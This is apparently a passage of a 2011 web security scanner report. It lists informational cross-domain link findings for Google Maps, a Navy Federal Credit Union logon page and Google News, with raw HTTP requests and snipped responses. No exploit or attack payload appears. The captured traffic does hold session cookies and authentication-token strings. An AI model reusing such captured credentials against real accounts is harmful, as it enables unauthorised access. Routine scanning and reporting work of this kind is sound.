</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img style="left:-289px;top:-33px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:-1679px;top:-279px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapf
...[SNIP]...
</div> <img style="left:-1679px;top:-279px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:-2097px;top:289px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfi
...[SNIP]...
</div> <img style="left:-2097px;top:289px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:270px;top:-36px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_ALL/mapfile
...[SNIP]...
</div> <img style="left:270px;top:-36px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/shadow50.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:0px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-34px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-68px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-102px" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:83px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="0f5JTavrEaD8yAWkj6GLDA" ved=0CCAQ_gswAA id="marker_A_2"><img alt="A" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_14490657949344599168" jsaction="si.togglePanelStarring" jsprops="markerid:'A';b_s:2" data-authtoken="f7a9ea36:itSJipiA9A_hnapkPmril5fJS-o" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'B'" jstrack="0f5JTavrEaD8yAWkj6GLDA" ved=0CC0Q_gswAQ id="marker_B_2"><img alt="B" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconB"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_11994300958079064810" jsaction="si.togglePanelStarring" jsprops="markerid:'B';b_s:2" data-authtoken="ce9f8ae1:7MgklqM3TuX50V2n6EnXOumFCsk" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
</script> <img alt="Photo" title="Photo" class="pp-linked-photo bt btm" src="http://lh5.googleusercontent.com/public/EN1goq9yU3LZOvdYt5EZV0vxeGiwz6g8_qLiPwQ005AXrP1NQDxZ2yv7jVT2fyDjgis7D0pzA4ttwc1bf7dVUB_Il0ux8qIeOykJkIsaTfjcCURmozux5l6m" onload="tick('cp1')"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'C'" jstrack="0f5JTavrEaD8yAWkj6GLDA" ved=0CDoQ_gswAg id="marker_C_2"><img alt="C" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconC"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_16020761648922662057" jsaction="si.togglePanelStarring" jsprops="markerid:'C';b_s:2" data-authtoken="843b5838:cy6w069yjJMPjGcnrEElIyuOrmw" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'D'" jstrack="0f5JTavrEaD8yAWkj6GLDA" ved=0CEQQ_gswAw id="marker_D_2"><img alt="D" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="mp iconD"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_7999026198986382882" jsaction="si.togglePanelStarring" jsprops="markerid:'D';b_s:2" data-authtoken="cce234b4:q2GAQKczR3hJtkGwdW64RS6w1jc" src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div><img class="btp bt noprint" src="http://lh3.googleusercontent.com/public/e75TZH8xa7mU-EJPN1_MaQnqJL8kEKiU55q1gB6hd82X7h6FRScxDRxHf9tyKtbIcHcCKoxY-YUOqPvK5ISqbyqVKp5MGnFwPA7Od0zCz4ZFpCCZPim6RcrB" /><div>
...[SNIP]...
<div class="notice">Business listings provided by <a href="http://www.paginasamarillas.es">PaginasAmarillas.es</a>, Business listings provided by <a href="http://www.findbiz.gr/">ICAP Group &amp; www.findbiz.gr</a>
...[SNIP]...

16.22. http://maps.google.com/maps/place  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/place

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /maps/place?hl=en&um=1&ie=UTF-8&\x3den\x26um\x3d1\x26ie\x3dUTF-8\x26q\x3d\x26fb\x3d1\x26gl\x3dus\x26hq\x3d\x26hnear\x3dCambridge,+MA\x26cid\x3d HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:03:14 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=cf17d0559f9db526:TM=1296694994:LM=1296694994:S=MZulzplirxwzj7lI; expires=Sat, 02-Feb-2013 01:03:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&um=1&ie=UTF-8&%5Cx3den%5Cx26um%5Cx3d1%5Cx26ie%5Cx3dUTF-8%5Cx26q%5Cx3d%5Cx26fb%5Cx3d1%5Cx26gl%5Cx3dus%5Cx26hq%5Cx3d%5Cx26hnear%5Cx3dCambridge,+MA%5Cx26cid%5Cx3d=&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.23. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myaccounts.navyfcu.org
Path:   /cgi-bin/ifsewwwc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/ifsewwwc?Logon HTTP/1.1
Host: myaccounts.navyfcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:06 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpool-MYACCOUNTS-IFSE_1443=1091045898.41733.0000; path=/
Content-Length: 15013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template filename: LogonForm.html 65 -->
<html xmlns="http://www.w3.org/1
...[SNIP]...
</title>
<script src="https://www.navyfederal.org/js/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="https://www.navyfederal.org/js/jquery-ui-1.8.4.custom.min.js"></script>
<script type="text/javascript" src="https://www.navyfederal.org/js/facebox.js"></script>
<script language="javascript" type="text/javascript" src="https://www.navyfederal.org/js/jquery.pngFix.js"></script>
<link href="https://www.navyfederal.org/css/main.css" media="screen" type="text/css" rel="stylesheet" />
<link href="https://www.navyfederal.org/css/facebox.css" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript">
...[SNIP]...
<div id="logo"><a href="https://www.navyfederal.org/index.php">Navy Federal Credit Union</a>
...[SNIP]...
<div id="dod_hdr"><a href="https://www.navyfederal.org/membership-benefits/military-exclusives.php">We Serve Where You Serve</a>
...[SNIP]...
<li class="arrow2"><a href="https://www.navyfederal.org/account-management/index.php">Not registered yet? Enroll now.</a>
...[SNIP]...
<li class="arrow2"><a href="https://www.navyfederal.org/account-management/how-do-i.php">Need more information?</a>
...[SNIP]...
<span style="margin-right:5px;"><a href="https://www.navyfederal.org/index.php">Home</a></span>|<span style="margin: 0 5px 0 5px;"><a href="https://www.navyfederal.org/about/about.php">About Us</a>
...[SNIP]...
<span style="margin: 0 5px 0 5px;"><a href="https://www.navyfederal.org/contact-us.php">Contact Us</a>
...[SNIP]...
<span style="margin: 0 5px 0 5px;"><a href="https://www.navyfederal.org/branches-atms/index.php">Branches &amp; ATMs</a>
...[SNIP]...
<li style="margin-top: 12px;"><a href="https://www.navyfederal.org/about/about.php">About Us</a>
...[SNIP]...
<li style="margin-top: 12px;"><a href="https://www.navyfederal.org/branches-atms/index.php">Branches &amp; ATMs</a>
...[SNIP]...
<li style="margin-top: 12px;"><a href="https://www.navyfederal.org/about/about.php">Careers</a>
...[SNIP]...
<li style="margin-top: 12px;"><a href="https://www.navyfederal.org/contact-us.php">Contact Us</a>
...[SNIP]...
<li class="last" style="margin-top: 12px;"><a href="https://www.navyfederal.org/site-map.php">Site Map</a>
...[SNIP]...
</span> | View our <a href="https://www.navyfederal.org/pdf/publications/NFCU_198_PrivacyPolicy.pdf">Privacy Policy</a>
...[SNIP]...
<span class="ncua">Your savings federally insured to at least $250,000 and backed by the full faith and credit of the United States Government <a href="https://www.navyfederal.org/pdf/ebrochures/1116e.pdf">More information</a>
...[SNIP]...
<div id="browserRequirements" style="display:none;">
<iframe src="https://www.navyfederal.org/browser-requirements.html" marginheight="0" marginwidth="0" frameborder="0" width="600" height="530" scrolling="no"></iframe>
...[SNIP]...

16.24. http://news.google.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news?pz=1&ned=us HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:04:03 GMT
Expires: Thu, 03 Feb 2011 01:04:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;topic=h&amp;num=3&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&ned=us&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/2011/02/03/us-egypt-usa-idUSTRE71175920110203" class="usg-AFQjCNHUreB1S8lZv7nCe7qQFR4QPKY0sQ " title="Reuters"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/zsTCffNCFDzrRM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/2011/02/03/us-egypt-usa-idUSTRE71175920110203" class="usg-AFQjCNHUreB1S8lZv7nCe7qQFR4QPKY0sQ "> Reuters </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGp6ylcoEgj9OmV2upscs9cAFXatw " href="http://www.cnn.com/2011/POLITICS/02/02/us.egypt.unrest/" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=-PfpaF3pGPw">Video:&nbsp;
Sights and Sounds: Clashes Over Mubarak
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/World/Backchannels/2011/0202/Egypt-uprising-Making-my-way-home-during-the-battle-for-Tahrir" target="_blank" class="usg-AFQjCNEl2XZSGqpyw0G3n5NNaHIvuneSLQ " id="MAA4AEgAUAFgAmoCdXM">Egypt uprising: Making my way home during the battle for Tahrir</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHdePguPXeiClJVRKU3gsCKztjluw " href="http://www.miamiherald.com/2011/02/02/2047707/chaos-erupts-in-cairo-as-mubarak.html" id="MAA4AEgAUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF5hm6gWv-U0aj7yx1aEu9ZaOWd5g " href="http://www.latimes.com/news/nationworld/world/la-fg-egypt-square-scene-20110203,0,3157253.story" id="MAA4AEgAUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHmaaLbZIv6wYOY3LooYB6FWPBEQA " href="http://asia.wsj.com/article/SB10001424052748703960804576119451124847090.html" id="MAA4AEgAUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHQrOhqcLZkYOPdT3_TIFRhl5BtRw " href="http://www.voanews.com/english/news/US-Decries-Use-of-Thugs-Against-Egyptian-Protesters--115146154.html" id="MAA4AEgAUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/2011/02/02/us-usa-healthcare-congress-idUSTRE70O62D20110202" class="usg-AFQjCNH842LgCuESUMOC6jZ20j3xMZhvzw " title="Reuters"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/8hYVyft8YoR-pM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/2011/02/02/us-usa-healthcare-congress-idUSTRE70O62D20110202" class="usg-AFQjCNH842LgCuESUMOC6jZ20j3xMZhvzw "> Reuters </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHdgH1kyCAkDn_SXgEZ3PWEZDI4aw " href="http://www.latimes.com/news/nationworld/nation/sc-dc-healthcare-repeal-20110203,0,4542704.story" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.foxnews.com/politics/2011/02/02/senate-debates-health-care-law-anew-wholesale-repeal-unlikely/" target="_blank" class="usg-AFQjCNFRGtrsgfFAkbn-fNj4I_JkRVAs3Q " id="MAA4AEgBUAFgAmoCdXM">Senate Votes Down Effort to Repeal Health Care Law</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-02-02/senate-democrats-defeat-republican-bid-to-repeal-health-law.html" target="_blank" class="usg-AFQjCNFa1oGtYxzxQ8ChqUZjbpZxXboB4w " id="MAA4AEgBUAJgAmoCdXM">Senate Democrats Defeat Republican Bid to Repeal Health Law</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGP-g8f5IEk2CpSRPznBp8yC54l6A " href="http://voices.washingtonpost.com/44/2011/02/senate-debates-health-care-rep.html" id="MAA4AEgBUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZsuBI5vOsugo9gUGb3ZCpjLfw9w " href="http://abcnews.go.com/Business/wireStory?id=12824678" id="MAA4AEgBUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGvibpyi4q21pNgk31bOSLmMCNgng " href="http://pheedo.msnbc.msn.com/click.phdo?i=f2c999962847f537c60a247cb24fe160" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHA6vytQZz6zkVTUlQ_KtQpIgGDbQ " href="http://online.wsj.com/article/SB10001424052748704775604576120602891006160.html" id="MAA4AEgBUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/world/story/2011/02/02/us-snowstorm-midwest-chicago.html" class="usg-AFQjCNH9C5jZ1Vl-d_WCcXHJi98t8OUmOg " title="CBC.ca"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/EpJtJ3ld8zL1WM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/world/story/2011/02/02/us-snowstorm-midwest-chicago.html" class="usg-AFQjCNH9C5jZ1Vl-d_WCcXHJi98t8OUmOg "> CBC.ca </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNF0yWioRO9zQc7KO_uh05uwJULMag " href="http://online.wsj.com/article/SB10001424052748703960804576119680896899752.html" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=mH4QGtuxlyk">Video:&nbsp;
Midwest Buckles Under a Snowstorm for the Decade
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/US/wireStory?id=12826049" target="_blank" class="usg-AFQjCNGc3aD1R0C5SCJEe_hk71BfVYmKoA " id="MAA4AEgCUAFgAmoCdXM">Blizzard Spreads Snowy Shroud Over Nearly Half US</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEPM4D4Jk7JV8q4z9ftOgkYJGqiSg " href="http://www.courier-journal.com/article/20110202/NEWS01/302020150/Northeast-hammered-by-snow-ice?odyssey=tab%7Ctopnews%7Ctext%7CHome" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGekXS9l65mv3837MpbuVVhIWiybw " href="http://www.reuters.com/article/2011/02/02/us-weather-chicago-idUSTRE71180W20110202" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEyWa6EDpgmcd78z1E5_OgNfd_L7A " href="http://chicagobreakingbusiness.com/2011/02/snow-hits-chicago-businesses-big-companies-malls-closed.html" id="MAA4AEgCUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFxa3mvRvGtQcmaSYHcGWbLTb8sdA " href="http://www.bloomberg.com/news/2011-02-02/storm-brings-snow-freezing-rain-to-cancel-flights-trains-school-in-u-s-.html" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/entertainment/2011/02/02/charlie-sheen-compares-errol-flynn-bizarre-statement/" class="usg-AFQjCNHjk1jMPUh7Fxfvdlkdf8bxmaJp5Q " title="Fox News"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/sTYBhxaWcx3VuM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/entertainment/2011/02/02/charlie-sheen-compares-errol-flynn-bizarre-statement/" class="usg-AFQjCNHjk1jMPUh7Fxfvdlkdf8bxmaJp5Q "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNH6OYbMcxvj6LsrTg9EGG9cyo8VCA " href="http://www.latimes.com/entertainment/sns-rt-charlie-sheen-says-he-has-work-to-do-in-recovery-20110202,0,7395699.story" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/entertainment/post/2011/02/charlie-sheen-likens-himself-to-errol-flynn-in-statement/1" target="_blank" class="usg-AFQjCNGEcZ9ejgXRwQ4-ivqPuVTzebyuEw " id="MAA4AEgDUAFgAmoCdXM">Charlie Sheen likens himself to Errol Flynn in statement</a>
...[SNIP]...
